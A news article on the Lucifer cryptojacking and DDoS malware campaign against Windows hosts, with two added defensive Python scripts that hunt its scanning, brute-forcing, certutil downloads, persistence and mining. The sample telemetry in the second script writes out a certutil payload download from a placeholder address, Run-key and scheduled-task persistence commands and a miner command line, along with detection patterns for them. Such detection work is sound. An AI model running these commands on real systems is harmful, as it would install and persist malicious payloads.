A new variant of a hybrid cryptojacking and DDoS malware family is abusing known, critical vulnerabilities to infect Windows machines. The malware, dubbed Lucifer, is part of an active campaign against Windows hosts, and numerous weaponized exploits have been used in the latest attacks.
According to Palo Alto Networks' Unit 42, the malware's operator named their creation Satan DDoS. Because a ransomware family named Satan already exists, the researchers assigned it a different name to avoid confusion.
Researchers Ken Hsu, Durgesh Sangvikar, Zhibin Zhang and Chris Navarrete write in their blog post that the latest variant, Lucifer v.2, was discovered on May 29 while they were investigating exploitation of CVE-2019-9081, a deserialization bug in the Laravel Framework that can be abused for remote code execution (RCE).
Further analysis showed that this is only one of many vulnerabilities the malware exploits. The list covers both web applications and Windows itself: CVE-2014-6287 (Rejetto HTTP File Server), CVE-2018-1000861 (Jenkins), CVE-2017-10271 (Oracle WebLogic), CVE-2018-20062 (ThinkPHP RCE), CVE-2018-7600 (Drupal), CVE-2017-9791 (Apache Struts 2), CVE-2019-9081 (Laravel), CVE-2017-0144 and CVE-2017-0145 (Windows SMBv1, patched in MS17-010), and CVE-2017-8464 (Windows LNK file handling).
Patches are available for all of these flaws, but on systems that have not been updated they are trivial to exploit, and code execution for the purpose of cryptocurrency mining is one of the attackers' main goals.
Lucifer is a powerful hybrid malware capable of cryptojacking and harnessing infected machines to perform Distributed Denial-of-Service (DDoS) attacks.
To find targets, the malware scans for open TCP ports 135 (RPC) and 1433 (MSSQL) and then brute-forces credentials to gain access. It can infect targets through IPC, WMI, SMB and FTP using these brute-force attacks, as well as through MSSQL, RPC and network shares.
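The propagation pattern described above (a sweep of many hosts on 135/1433 followed by a run of failed logins against one of them) is easy to spot in flow and authentication logs once both signals are correlated. The following is an added example, not code from the article or from Unit 42; it assumes two constructed, whitespace-separated log formats (`src dst dport` for connections and `src dst user result` for login attempts) and thresholds chosen for illustration.

```python
"""Hunt for Lucifer-style propagation: port sweeps on TCP 135/1433 followed by
credential brute-forcing. Added example; not the article's or Unit 42's code.
Assumed (constructed) log formats:
  flow lines:  "<src> <dst> <dport>"          one line per TCP connection
  login lines: "<src> <dst> <user> <result>"  result is OK or FAIL
"""
from collections import defaultdict

# Ports the article says Lucifer probes when hunting for new victims.
TARGET_PORTS = {135, 1433}


def parse_flows(text):
    """Return (src, dst, dport) tuples, skipping blank or malformed lines."""
    flows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3 or not parts[2].isdigit():
            continue
        flows.append((parts[0], parts[1], int(parts[2])))
    return flows


def find_scanners(flows, min_targets=10):
    """Sources that touched at least min_targets distinct hosts on RPC/MSSQL ports."""
    targets = defaultdict(set)
    for src, dst, dport in flows:
        if dport in TARGET_PORTS:
            targets[src].add(dst)
    return {src: len(hosts) for src, hosts in targets.items() if len(hosts) >= min_targets}


def parse_logins(text):
    """Return (src, dst, user, result) tuples, skipping malformed lines."""
    return [tuple(p) for p in (line.split() for line in text.splitlines()) if len(p) == 4]


def find_bruteforce(logins, min_failures=5):
    """(src, dst) pairs with >= min_failures failed logins, and whether a success followed."""
    fails = defaultdict(int)
    success_after = defaultdict(bool)
    for src, dst, _user, result in logins:
        key = (src, dst)
        if result == "FAIL":
            fails[key] += 1
        elif result == "OK" and fails[key] >= min_failures:
            success_after[key] = True  # brute force that finally worked: highest priority
    return {key: (n, success_after[key]) for key, n in fails.items() if n >= min_failures}


# Constructed sample data (not real traffic): 10.0.0.5 sweeps 12 hosts on 135, then
# brute-forces MSSQL on 10.0.1.20; 10.0.0.7 and 10.0.0.9 are below threshold / benign.
SAMPLE_FLOWS = "\n".join(
    [f"10.0.0.5 10.0.1.{i} 135" for i in range(1, 13)]
    + ["10.0.0.5 10.0.1.20 1433", "10.0.0.9 10.0.1.2 443", "10.0.0.9 10.0.1.3 443",
       "10.0.0.7 10.0.1.4 1433", "10.0.0.7 10.0.1.5 1433"]
)
SAMPLE_LOGINS = "\n".join(
    ["10.0.0.5 10.0.1.20 sa FAIL"] * 7
    + ["10.0.0.5 10.0.1.20 sa OK", "10.0.0.9 10.0.1.2 alice OK", "10.0.0.7 10.0.1.4 sa FAIL"]
)


def hunt(flow_text=SAMPLE_FLOWS, login_text=SAMPLE_LOGINS):
    """Correlate both signals per source; a host that scans and brute-forces is high confidence."""
    findings = {}
    for src, n in find_scanners(parse_flows(flow_text)).items():
        findings[src] = {"scanned_hosts": n, "bruteforce": []}
    for (src, dst), (n, ok) in find_bruteforce(parse_logins(login_text)).items():
        entry = findings.setdefault(src, {"scanned_hosts": 0, "bruteforce": []})
        entry["bruteforce"].append({"target": dst, "failures": n, "succeeded": ok})
    return findings


if __name__ == "__main__":
    for src, info in hunt().items():
        print(src, info)
```

On real data the sweep count should be computed over a time window and the failed-login source should be the MSSQL error log or Windows event 4625 rather than a flat file; the correlation logic stays the same.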
Once established on a machine, the malware drops XMRig, an open-source miner it uses to covertly mine the Monero (XMR) cryptocurrency.
Lucifer also connects to a command-and-control (C2) server to receive commands, such as an instruction to launch a DDoS attack, to transfer stolen system data, and to report the status of the Monero miner to the operators.
Lucifer uses the same vulnerabilities and brute-force attacks to compromise additional hosts reachable from the original infection point.
The researchers state that the targets are Windows hosts on both the internet and internal networks, given that the attacker uses the built-in Windows certutil utility, a tool commonly abused to download files, in the payload for propagation.
The EternalBlue and EternalRomance exploits and the DoublePulsar backdoor are dropped to spread and maintain a foothold, and the malware also modifies the Windows registry to schedule itself to run at startup.
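The host-side behaviours the article lists (certutil used as a downloader, persistence through a Run key or scheduled task, and an XMRig-style miner process) each leave a distinctive command line in process-creation telemetry. The following is an added example, not code from the article or from Unit 42; it assumes a constructed pipe-separated event format (`time|host|image|command line`, roughly what Sysmon event 1 or Windows event 4688 would give you after export) and illustrative, not real, paths and pool addresses.

```python
"""Hunt process-creation events for the Lucifer behaviours the article describes.
Added example; not the article's or Unit 42's code. Assumed (constructed) format:
  "<time>|<host>|<image>|<command line>"  one event per line
"""
import re

# Each rule: (name, image pattern or None for any image, command-line pattern).
RULES = [
    # certutil fetching a remote file: the classic living-off-the-land downloader
    ("certutil_download", r"certutil\.exe$", r"-urlcache\b.*\bhttps?://"),
    # reg.exe writing a Run / RunOnce value for startup persistence
    ("run_key_persistence", r"reg\.exe$", r"\badd\b.*\\CurrentVersion\\Run(Once)?\b"),
    # schtasks creating a task (the article: scheduled to run at startup)
    ("schtasks_persistence", r"schtasks\.exe$", r"/create\b"),
    # XMRig-style miner: stratum pool URL or XMRig-specific flags in any image
    ("xmrig_miner", None, r"stratum\+tcp://|--donate-level|xmrig"),
]
COMPILED = [(n, re.compile(i, re.I) if i else None, re.compile(c, re.I)) for n, i, c in RULES]


def parse_events(text):
    """Return (time, host, image, cmdline) tuples, skipping blank or malformed lines."""
    events = []
    for line in text.splitlines():
        parts = line.split("|", 3)
        if len(parts) != 4:
            continue
        events.append(tuple(p.strip() for p in parts))
    return events


def match_rules(image, cmdline):
    """Names of every rule whose image and command-line patterns both match."""
    hits = []
    for name, image_re, cmd_re in COMPILED:
        if image_re is not None and not image_re.search(image):
            continue
        if cmd_re.search(cmdline):
            hits.append(name)
    return hits


def hunt(text):
    """Map host -> list of (rule, image, cmdline) for every matching event."""
    findings = {}
    for _time, host, image, cmdline in parse_events(text):
        for rule in match_rules(image, cmdline):
            findings.setdefault(host, []).append((rule, image, cmdline))
    return findings


def suspicious_hosts(text, min_rules=2):
    """Hosts where at least min_rules distinct behaviours fired: a chain, not a one-off."""
    return sorted(h for h, hits in hunt(text).items() if len({r for r, _, _ in hits}) >= min_rules)


# Constructed sample events (not real telemetry). WS-17 shows the full chain;
# WS-02 runs certutil and schtasks for legitimate reasons and must not fire.
SAMPLE_EVENTS = r"""
2020-06-11T10:00:01|WS-17|C:\Windows\System32\certutil.exe|certutil -urlcache -split -f http://203.0.113.10/payload.exe C:\Users\Public\payload.exe
2020-06-11T10:00:02|WS-17|C:\Windows\System32\reg.exe|reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d C:\Users\Public\payload.exe /f
2020-06-11T10:00:03|WS-17|C:\Windows\System32\schtasks.exe|schtasks /create /sc onstart /tn Updater /tr C:\Users\Public\payload.exe /ru SYSTEM
2020-06-11T10:00:09|WS-17|C:\Users\Public\payload.exe|payload.exe -o stratum+tcp://pool.example.invalid:3333 -u 4ABC --donate-level 0
2020-06-11T10:05:00|WS-02|C:\Windows\System32\certutil.exe|certutil -hashfile C:\tmp\iso.img SHA256
2020-06-11T10:06:00|WS-02|C:\Windows\System32\schtasks.exe|schtasks /query /tn Backup
"""

if __name__ == "__main__":
    for host, hits in hunt(SAMPLE_EVENTS).items():
        for rule, image, cmdline in hits:
            print(f"{host}: {rule}: {cmdline}")
    print("suspicious:", suspicious_hosts(SAMPLE_EVENTS))
```

Requiring two distinct rules per host keeps a lone `certutil -urlcache` from paging anyone, while the download-then-persist-then-mine sequence on a single host is exactly the chain the article describes. The miner rule is deliberately image-agnostic because the dropped binary can be named anything.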
Lucifer also attempts to evade detection and analysis by checking for sandboxes and virtual machines. If it finds one, it enters an infinite loop and does nothing further.
The first attack wave, using Lucifer v.1, stopped on June 10. The next day the operators returned with v.2, which "wreaked havoc" on target machines, and the attacks are ongoing.
The researchers advise users to apply updates and patches to the affected software as early as possible and, since the malware also relies on brute-forcing weak credentials, to use strong passwords on exposed services.